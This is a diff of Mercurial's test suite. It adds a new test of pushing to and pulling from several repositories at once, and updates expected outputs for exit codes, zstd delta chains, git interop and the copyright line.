+ $ hg diff --config diff.merge=no -c 11
+ diff -r fd1f17c90d7c -r 5010caab09f6 new-file-p2.txt
+ --- /dev/null Thu Jan 01 00:00:00 1970 +0000
+ +++ b/new-file-p2.txt Thu Jan 01 00:00:00 1970 +0000
+ @@ -0,0 +1,1 @@
+ +this file is new in p2 of the merge
+With diff.merge, it's a diff against the conflicted content.
+ $ hg diff --config diff.merge=yes -c 11
+ diff -r 5010caab09f6 file.txt
+ --- a/file.txt Thu Jan 01 00:00:00 1970 +0000
+ +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000
+ @@ -6,12 +6,6 @@
+ 5
+ 6
+ 7
+ -<<<<<<< local: fd1f17c90d7c - test: new file
+ z
+ -||||||| base
+ -8
+ -=======
+ -y
+ ->>>>>>> other: d9e7de69eac3 - test: new file
+ 9
+ 10
+
+There must _NOT_ be a .hg/merge directory leftover.
+ $ test ! -d .hg/merge
+(No output is expected)
$ cd ..
--- a/tests/test-dispatch.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-dispatch.t Tue Apr 20 11:01:06 2021 -0400
@@ -154,7 +154,7 @@
$ HGPLAIN=+strictflags hg --config='hooks.pre-log=false' log -b default
abort: pre-log hook exited with status 1
- [255]
+ [40]
$ HGPLAIN=+strictflags hg --cwd .. -q -Ra log -b default
0:cb9a9f314b8b
$ HGPLAIN=+strictflags hg --cwd .. -q --repository a log -b default
@@ -166,7 +166,7 @@
$ HGPLAIN= hg log --config='hooks.pre-log=false' -b default
abort: pre-log hook exited with status 1
- [255]
+ [40]
$ HGPLAINEXCEPT= hg log --cwd .. -q -Ra -b default
0:cb9a9f314b8b
--- a/tests/test-doctest.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-doctest.py Tue Apr 20 11:01:06 2021 -0400
@@ -158,6 +158,7 @@
('mercurial.util', '{}'),
('mercurial.utils.dateutil', '{}'),
('mercurial.utils.stringutil', '{}'),
+ ('mercurial.utils.urlutil', '{}'),
('tests.drawdag', '{}'),
('tests.test-run-tests', '{}'),
('tests.test-url', "{'optionflags': 4}"),
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-exchange-multi-source.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,613 @@
+====================================================
+Test push/pull from multiple source at the same time
+====================================================
+
+
+Setup
+=====
+
+main repository
+---------------
+
+ $ . $RUNTESTDIR/testlib/common.sh
+ $ hg init main-repo
+ $ cd main-repo
+ $ mkcommit A
+ $ mkcommit B
+ $ mkcommit C
+ $ mkcommit D
+ $ mkcommit E
+ $ hg up 'desc(B)'
+ 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
+ $ mkcommit F
+ created new head
+ $ mkcommit G
+ $ hg up 'desc(C)'
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved
+ $ mkcommit H
+ created new head
+ $ hg up null --quiet
+ $ hg log -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 7
+ |
+ | o E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ | o G 6
+ | |
+ | o F 5
+ |/
+ o B 1
+ |
+ o A 0
+
+ $ cd ..
+
+Various other repositories
+--------------------------
+
+ $ hg clone main-repo branch-E --rev 4 -U
+ adding changesets
+ adding manifests
+ adding file changes
+ added 5 changesets with 5 changes to 5 files
+ new changesets 4a2df7238c3b:a603bfb5a83e
+ $ hg clone main-repo branch-G --rev 6 -U
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files
+ new changesets 4a2df7238c3b:c521a06b234b
+ $ hg clone main-repo branch-H --rev 7 -U
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files
+ new changesets 4a2df7238c3b:40faebb2ec45
+
+Test simple bare operation
+==========================
+
+pull
+----
+
+ $ hg clone main-repo test-repo-bare --rev 0 -U
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 4a2df7238c3b
+
+ $ hg pull -R test-repo-bare ./branch-E ./branch-G ./branch-H
+ pulling from ./branch-E
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files
+ new changesets 27547f69f254:a603bfb5a83e
+ (run 'hg update' to get a working copy)
+ pulling from ./branch-G
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 2 changes to 2 files (+1 heads)
+ new changesets 2f3a4c5c1417:c521a06b234b
+ (run 'hg heads' to see heads, 'hg merge' to merge)
+ pulling from ./branch-H
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files (+1 heads)
+ new changesets 40faebb2ec45
+ (run 'hg heads .' to see heads, 'hg merge' to merge)
+ $ hg log -R test-repo-bare -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 7
+ |
+ | o E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ | o G 6
+ | |
+ | o F 5
+ |/
+ o B 1
+ |
+ o A 0
+
+
+push
+----
+
+ $ cp -R ./branch-E ./branch-E-push
+ $ cp -R ./branch-G ./branch-G-push
+ $ cp -R ./branch-H ./branch-H-push
+ $ hg out -G -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push
+ comparing with ./branch-E-push
+ searching for changes
+ comparing with ./branch-G-push
+ searching for changes
+ comparing with ./branch-H-push
+ searching for changes
+ o changeset: 7:40faebb2ec45
+ | tag: tip
+ | parent: 2:f838bfaca5c7
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: H
+ |
+ | o changeset: 6:c521a06b234b
+ | | user: test
+ | | date: Thu Jan 01 00:00:00 1970 +0000
+ | | summary: G
+ | |
+ | o changeset: 5:2f3a4c5c1417
+ | parent: 1:27547f69f254
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: F
+ |
+ | o changeset: 4:a603bfb5a83e
+ | | user: test
+ | | date: Thu Jan 01 00:00:00 1970 +0000
+ | | summary: E
+ | |
+ | o changeset: 3:b3325c91a4d9
+ |/ user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: D
+ |
+ o changeset: 2:f838bfaca5c7
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: C
+
+ $ hg bundle -R test-repo-bare bundle.hg ./branch-E-push ./branch-G-push ./branch-H-push
+ searching for changes
+ searching for changes
+ searching for changes
+ 6 changesets found
+ $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push
+ pushing to ./branch-E-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 3 changes to 3 files (+2 heads)
+ pushing to ./branch-G-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files (+2 heads)
+ pushing to ./branch-H-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files (+2 heads)
+ $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 7
+ |
+ | o E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ | o G 6
+ | |
+ | o F 5
+ |/
+ o B 1
+ |
+ o A 0
+
+ $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 7
+ |
+ | o E 6
+ | |
+ | o D 5
+ |/
+ o C 4
+ |
+ | o G 3
+ | |
+ | o F 2
+ |/
+ o B 1
+ |
+ o A 0
+
+ $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o G 7
+ |
+ o F 6
+ |
+ | o E 5
+ | |
+ | o D 4
+ | |
+ | | o H 3
+ | |/
+ | o C 2
+ |/
+ o B 1
+ |
+ o A 0
+
+ $ rm -rf ./*-push
+
+Test operation with a target
+============================
+
+pull
+----
+
+ $ hg clone main-repo test-repo-rev --rev 0 -U
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 4a2df7238c3b
+
+pulling an explicite revision
+
+ $ node_b=`hg log -R main-repo --rev 'desc(B)' -T '{node}'`
+ $ hg pull -R test-repo-rev ./branch-E ./branch-G ./branch-H --rev $node_b
+ pulling from ./branch-E
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 27547f69f254
+ (run 'hg update' to get a working copy)
+ pulling from ./branch-G
+ no changes found
+ pulling from ./branch-H
+ no changes found
+ $ hg log -R test-repo-rev -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o B 1
+ |
+ o A 0
+
+
+pulling a branch head, the branch head resolve to different revision on the
+different repositories.
+
+ $ hg pull -R test-repo-rev ./branch-E ./branch-G ./branch-H --rev default
+ pulling from ./branch-E
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 3 changes to 3 files
+ new changesets f838bfaca5c7:a603bfb5a83e
+ (run 'hg update' to get a working copy)
+ pulling from ./branch-G
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 2 changes to 2 files (+1 heads)
+ new changesets 2f3a4c5c1417:c521a06b234b
+ (run 'hg heads' to see heads, 'hg merge' to merge)
+ pulling from ./branch-H
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files (+1 heads)
+ new changesets 40faebb2ec45
+ (run 'hg heads .' to see heads, 'hg merge' to merge)
+ $ hg log -R test-repo-rev -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 7
+ |
+ | o E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ | o G 6
+ | |
+ | o F 5
+ |/
+ o B 1
+ |
+ o A 0
+
+
+push
+----
+
+We only push a specific branch with --rev
+
+ $ cp -R ./branch-E ./branch-E-push
+ $ cp -R ./branch-G ./branch-G-push
+ $ cp -R ./branch-H ./branch-H-push
+ $ hg out -G -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default
+ comparing with ./branch-E-push
+ searching for changes
+ comparing with ./branch-G-push
+ searching for changes
+ comparing with ./branch-H-push
+ searching for changes
+ no changes found
+ o changeset: 7:40faebb2ec45
+ | tag: tip
+ | parent: 2:f838bfaca5c7
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: H
+ |
+ o changeset: 2:f838bfaca5c7
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: C
+
+ $ hg bundle -R test-repo-bare bundle.hg ./branch-E-push ./branch-G-push ./branch-H-push --rev default
+ searching for changes
+ searching for changes
+ searching for changes
+ 2 changesets found
+ $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default
+ pushing to ./branch-E-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files (+1 heads)
+ pushing to ./branch-G-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 2 changes to 2 files (+1 heads)
+ pushing to ./branch-H-push
+ searching for changes
+ no changes found
+ $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 5
+ |
+ | o E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ o B 1
+ |
+ o A 0
+
+ $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 5
+ |
+ o C 4
+ |
+ | o G 3
+ | |
+ | o F 2
+ |/
+ o B 1
+ |
+ o A 0
+
+ $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 3
+ |
+ o C 2
+ |
+ o B 1
+ |
+ o A 0
+
+ $ rm -rf ./*-push
+
+Same push, but the first one is a no-op
+
+ $ cp -R ./branch-E ./branch-E-push
+ $ cp -R ./branch-G ./branch-G-push
+ $ cp -R ./branch-H ./branch-H-push
+ $ hg out -G -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default
+ comparing with ./branch-G-push
+ searching for changes
+ comparing with ./branch-H-push
+ searching for changes
+ no changes found
+ comparing with ./branch-E-push
+ searching for changes
+ o changeset: 7:40faebb2ec45
+ | tag: tip
+ | parent: 2:f838bfaca5c7
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: H
+ |
+ o changeset: 2:f838bfaca5c7
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: C
+
+ $ hg bundle -R test-repo-bare bundle.hg ./branch-G-push ./branch-H-push ./branch-E-push --rev default
+ searching for changes
+ searching for changes
+ searching for changes
+ 2 changesets found
+ $ hg push --force -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default
+ pushing to ./branch-G-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 2 changes to 2 files (+1 heads)
+ pushing to ./branch-H-push
+ searching for changes
+ no changes found
+ pushing to ./branch-E-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files (+1 heads)
+ $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 5
+ |
+ | o E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ o B 1
+ |
+ o A 0
+
+ $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 5
+ |
+ o C 4
+ |
+ | o G 3
+ | |
+ | o F 2
+ |/
+ o B 1
+ |
+ o A 0
+
+ $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 3
+ |
+ o C 2
+ |
+ o B 1
+ |
+ o A 0
+
+ $ rm -rf ./*-push
+
+
+Test with --update
+==================
+
+update without conflicts
+------------------------
+
+ $ hg clone main-repo test-repo-update --rev 0
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 4a2df7238c3b
+ updating to branch default
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+We update for each pull, so the first on get into a branch independant from the
+other and stay there. This is the expected behavior.
+
+ $ hg log -R test-repo-update -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ @ A 0
+
+ $ hg pull -R test-repo-update ./branch-E ./branch-G ./branch-H --update
+ pulling from ./branch-E
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files
+ new changesets 27547f69f254:a603bfb5a83e
+ 4 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ pulling from ./branch-G
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 2 changes to 2 files (+1 heads)
+ new changesets 2f3a4c5c1417:c521a06b234b
+ 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ updated to "a603bfb5a83e: E"
+ 1 other heads for branch "default"
+ pulling from ./branch-H
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files (+1 heads)
+ new changesets 40faebb2ec45
+ 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ updated to "a603bfb5a83e: E"
+ 2 other heads for branch "default"
+ $ hg log -R test-repo-update -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 7
+ |
+ | @ E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ | o G 6
+ | |
+ | o F 5
+ |/
+ o B 1
+ |
+ o A 0
+
+
+update with conflicts
+---------------------
+
+ $ hg clone main-repo test-repo-conflict --rev 0
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 4a2df7238c3b
+ updating to branch default
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+The update has conflict and interrupt the pull.
+
+ $ echo this-will-conflict > test-repo-conflict/D
+ $ hg add -R test-repo-conflict test-repo-conflict/D
+ $ hg log -R test-repo-conflict -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ @ A 0
+
+ $ hg pull -R test-repo-conflict ./branch-E ./branch-G ./branch-H --update
+ pulling from ./branch-E
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files
+ new changesets 27547f69f254:a603bfb5a83e
+ merging D
+ warning: conflicts while merging D! (edit, then use 'hg resolve --mark')
+ 3 files updated, 0 files merged, 0 files removed, 1 files unresolved
+ use 'hg resolve' to retry unresolved file merges
+ [1]
+ $ hg -R test-repo-conflict resolve -l
+ U D
+ $ hg log -R test-repo-conflict -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ @ E 4
+ |
+ o D 3
+ |
+ o C 2
+ |
+ o B 1
+ |
+ % A 0
+
--- a/tests/test-extension.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-extension.t Tue Apr 20 11:01:06 2021 -0400
@@ -676,7 +676,7 @@
Mercurial Distributed SCM (version *) (glob)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
@@ -1555,7 +1555,7 @@
Mercurial Distributed SCM (version *) (glob)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
@@ -1566,7 +1566,7 @@
Mercurial Distributed SCM (version *) (glob)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
@@ -1580,7 +1580,7 @@
Mercurial Distributed SCM (version *) (glob)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
@@ -1642,7 +1642,7 @@
Mercurial Distributed SCM (version 3.5.2)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
--- a/tests/test-fix.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-fix.t Tue Apr 20 11:01:06 2021 -0400
@@ -1106,14 +1106,13 @@
$ printf "foo\n" > foo.changed
$ hg commit -Aqm "foo"
- $ hg debugobsolete `hg parents --template '{node}'`
- 1 new obsolescence markers
- obsoleted 1 changesets
+ $ hg ci --amend -m rewritten
$ hg --hidden fix -r 0
abort: fixing obsolete revision could cause divergence
[255]
$ hg --hidden fix -r 0 --config experimental.evolution.allowdivergence=true
+ 2 new content-divergent changesets
$ hg cat -r tip foo.changed
FOO
--- a/tests/test-generaldelta.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-generaldelta.t Tue Apr 20 11:01:06 2021 -0400
@@ -106,22 +106,33 @@
3 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg -R repo debugdeltachain -m
rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio
- 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000
- 1 1 2 0 prev 57 135 161 1.19259 161 0 0.00000
- 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000
+ 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !)
+ 1 1 2 0 prev 57 135 161 1.19259 161 0 0.00000 (no-zstd !)
+ 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 (no-zstd !)
+ 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !)
+ 1 1 2 0 prev 57 135 164 1.21481 164 0 0.00000 (zstd !)
+ 2 1 3 1 prev 57 135 221 1.63704 221 0 0.00000 (zstd !)
3 2 1 -1 base 104 135 104 0.77037 104 0 0.00000
$ hg -R usegd debugdeltachain -m
rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio
- 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000
- 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000
- 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000
- 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807
+ 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !)
+ 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 (no-zstd !)
+ 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 (no-zstd !)
+ 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 (no-zstd !)
+ 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !)
+ 1 1 2 0 p1 57 135 164 1.21481 164 0 0.00000 (zstd !)
+ 2 1 3 1 prev 57 135 221 1.63704 221 0 0.00000 (zstd !)
+ 3 1 2 0 p1 57 135 164 1.21481 278 114 0.69512 (zstd !)
$ hg -R full debugdeltachain -m
rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio
- 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000
- 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000
- 2 1 2 0 p1 57 135 161 1.19259 218 57 0.35404
- 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807
+ 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !)
+ 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 (no-zstd !)
+ 2 1 2 0 p1 57 135 161 1.19259 218 57 0.35404 (no-zstd !)
+ 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 (no-zstd !)
+ 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !)
+ 1 1 2 0 p1 57 135 164 1.21481 164 0 0.00000 (zstd !)
+ 2 1 2 0 p1 57 135 164 1.21481 221 57 0.34756 (zstd !)
+ 3 1 2 0 p1 57 135 164 1.21481 278 114 0.69512 (zstd !)
Test revlog.optimize-delta-parent-choice
@@ -142,9 +153,12 @@
$ hg commit -q -m merge
$ hg debugdeltachain -m
rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio
- 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000
- 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000
- 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413
+ 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 (no-zstd !)
+ 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 (no-zstd !)
+ 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 (no-zstd !)
+ 0 1 1 -1 base 68 215 68 0.31628 68 0 0.00000 (zstd !)
+ 1 1 2 0 prev 70 86 138 1.60465 138 0 0.00000 (zstd !)
+ 2 1 2 0 p2 68 301 136 0.45183 206 70 0.51471 (zstd !)
$ hg strip -q -r . --config extensions.strip=
@@ -154,9 +168,12 @@
$ hg commit -q -m merge --config storage.revlog.optimize-delta-parent-choice=yes
$ hg debugdeltachain -m
rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio
- 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000
- 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000
- 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413
+ 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 (no-zstd !)
+ 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 (no-zstd !)
+ 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 (no-zstd !)
+ 0 1 1 -1 base 68 215 68 0.31628 68 0 0.00000 (zstd !)
+ 1 1 2 0 prev 70 86 138 1.60465 138 0 0.00000 (zstd !)
+ 2 1 2 0 p2 68 301 136 0.45183 206 70 0.51471 (zstd !)
Test that strip bundle use bundle2
$ hg --config extensions.strip= strip .
@@ -267,12 +284,17 @@
46 3 29 45 p1 58 1334 1671 1.25262 1671 0 0.00000
47 3 30 46 p1 58 1380 1729 1.25290 1729 0 0.00000
48 3 31 47 p1 58 1426 1787 1.25316 1787 0 0.00000
- 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000
- 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000
- 51 4 3 50 prev 356 594 611 1.02862 611 0 0.00000
- 52 4 4 51 p1 58 640 669 1.04531 669 0 0.00000
+ 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 (no-zstd !)
+ 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 (no-zstd !)
+ 51 4 3 50 prev 356 594 611 1.02862 611 0 0.00000 (no-zstd !)
+ 52 4 4 51 p1 58 640 669 1.04531 669 0 0.00000 (no-zstd !)
+ 49 4 1 -1 base 205 316 205 0.64873 205 0 0.00000 (zstd !)
+ 50 4 2 49 p1 58 362 263 0.72652 263 0 0.00000 (zstd !)
+ 51 4 3 50 prev 366 594 629 1.05892 629 0 0.00000 (zstd !)
+ 52 4 4 51 p1 58 640 687 1.07344 687 0 0.00000 (zstd !)
53 5 1 -1 base 0 0 0 0.00000 0 0 0.00000
- 54 6 1 -1 base 369 640 369 0.57656 369 0 0.00000
+ 54 6 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !)
+ 54 6 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !)
$ hg clone --pull source-repo --config experimental.maxdeltachainspan=2800 relax-chain --config format.generaldelta=yes
requesting all changes
adding changesets
@@ -333,12 +355,17 @@
46 3 29 45 p1 58 1334 1671 1.25262 1671 0 0.00000
47 3 30 46 p1 58 1380 1729 1.25290 1729 0 0.00000
48 3 31 47 p1 58 1426 1787 1.25316 1787 0 0.00000
- 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000
- 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000
- 51 2 13 17 p1 58 594 739 1.24411 2781 2042 2.76319
- 52 5 1 -1 base 369 640 369 0.57656 369 0 0.00000
+ 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 (no-zstd !)
+ 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 (no-zstd !)
+ 51 2 13 17 p1 58 594 739 1.24411 2781 2042 2.76319 (no-zstd !)
+ 52 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !)
+ 49 4 1 -1 base 205 316 205 0.64873 205 0 0.00000 (zstd !)
+ 50 4 2 49 p1 58 362 263 0.72652 263 0 0.00000 (zstd !)
+ 51 2 13 17 p1 58 594 739 1.24411 2789 2050 2.77402 (zstd !)
+ 52 5 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !)
53 6 1 -1 base 0 0 0 0.00000 0 0 0.00000
- 54 7 1 -1 base 369 640 369 0.57656 369 0 0.00000
+ 54 7 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !)
+ 54 7 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !)
$ hg clone --pull source-repo --config experimental.maxdeltachainspan=0 noconst-chain --config format.usegeneraldelta=yes --config storage.revlog.reuse-external-delta-parent=no
requesting all changes
adding changesets
@@ -404,4 +431,5 @@
51 2 13 17 p1 58 594 739 1.24411 2642 1903 2.57510
52 2 14 51 p1 58 640 797 1.24531 2700 1903 2.38770
53 4 1 -1 base 0 0 0 0.00000 0 0 0.00000
- 54 5 1 -1 base 369 640 369 0.57656 369 0 0.00000
+ 54 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !)
+ 54 5 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !)
--- a/tests/test-git-interop.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-git-interop.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,4 +1,4 @@
-#require pygit2
+#require pygit2 no-windows
Setup:
$ GIT_AUTHOR_NAME='test'; export GIT_AUTHOR_NAME
@@ -14,6 +14,7 @@
> git commit "$@" >/dev/null 2>/dev/null || echo "git commit error"
> count=`expr $count + 1`
> }
+ $ git config --global init.defaultBranch master
$ hg version -v --config extensions.git= | grep '^[E ]'
@@ -28,9 +29,9 @@
$ hg status
abort: repository specified git format in .hg/requires but has no .git directory
[255]
+ $ git config --global init.defaultBranch master
$ git init
Initialized empty Git repository in $TESTTMP/nogit/.git/
- $ git config --global init.defaultBranch master
This status invocation shows some hg gunk because we didn't use
`hg init --git`, which fixes up .git/info/exclude for us.
$ hg status
--- a/tests/test-globalopts.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-globalopts.t Tue Apr 20 11:01:06 2021 -0400
@@ -65,6 +65,8 @@
-R with path aliases:
+TODO: add rhg support for path aliases
+#if no-rhg
$ cd c
$ hg -R default identify
8580ff50825a tip
@@ -75,6 +77,7 @@
$ HOME=`pwd`/../ hg -R relativetohome identify
8580ff50825a tip
$ cd ..
+#endif
#if no-outer-repo
@@ -215,6 +218,8 @@
$ hg --cwd c --config paths.quuxfoo=bar paths | grep quuxfoo > /dev/null && echo quuxfoo
quuxfoo
+TODO: add rhg support for detailed exit codes
+#if no-rhg
$ hg --cwd c --config '' tip -q
